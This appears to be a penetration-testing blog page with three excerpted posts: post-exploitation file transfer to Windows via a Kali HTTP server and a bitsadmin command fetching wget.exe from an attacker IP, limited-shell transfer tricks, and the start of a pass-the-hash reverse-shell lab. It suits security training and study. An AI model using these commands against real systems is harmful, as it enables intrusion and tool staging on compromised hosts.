Personal Bits

On Kali : Set up an HTTP listener someplace where the wget.exe file can be fetched: cd /usr/share/windows-binaries/ python -m SimpleHTTPServer 80 On Windows : Create or change to a directory where your current user has permissions to create files: mkdir \temp cd \temp Get the wget.exe file: set HOSTIP=10.0.0.22 cmd /c "bitsadmin /transfer wcb /priority foreground http://%HOSTIP%/wget.exe %cd%\wget.exe" Tested and working on default installs of: Windows Vista 32 bit Windows vista 64 bit Windows server 2008 standard SP1 32 bit Windows 7 SP1 32 bit Windows 7 SP1 64 bit Windows 8 32 bit Windows 8 64 bit Windows server 2012 64 bit Did not work on Windows versions prior to Vista and is deprecated and not working on Windows 10.

Today I saw a twitter post by @DissectMalware about using finger to download data. I thought I would try it and see if I could find a good purpose for it (it is limited to textual data). One annoying thing I find is when attempting to do file transfer on a Windows host that does not have a TFTP client or PowerShell. The solution is to paste in a 25 line VBScript. This wouldn't be so bad but usually I find I am restricted on a shell to pasting in at most 5 lines at a time and sometimes even less without corruption of the resulting script. The only way to know if the resulting script was successfully pasted is to type it out and examine all 25 lines (if they all made it into the file). Just running the script without knowing it is correct risks losing the shell. I have hung my shell more than once. By the way don't bother trying the FTP client. The challenge is more than just that you have to create a script file so you can run it non-interactively. Besides having Windows Def

Useful Background: http://passing-the-hash.blogspot.ca/2013/04/missing-pth-tools-writeup-wmic-wmis-curl.html http://passing-the-hash.blogspot.ca/2013/07/WMIS-PowerSploit-Shells.html Resource: Combined PowerShell and CMD Reverse Shell Purpose: Test the use of the "Combined PowerShell and CMD Reverse Shell" together with the Pass-The-Hash version of wmis (pth-wmis). Disclaimer: These scripts are provided for educational purposes only and for use by Ethical Hackers. Use only on systems for which you have acquired all the legally required contracts and permissions for use. It is your responsibility to determine whether you are legally permitted to use these scripts in your country and for your purposes. No warrantee or guarantees are provided. Attacking Box: 32bit Offsec VM - Kali Target Box: Windows 7 Professional Service Pack 1 We Have A Hash From another compromised box on the same network we have captured the local Administrator's hash: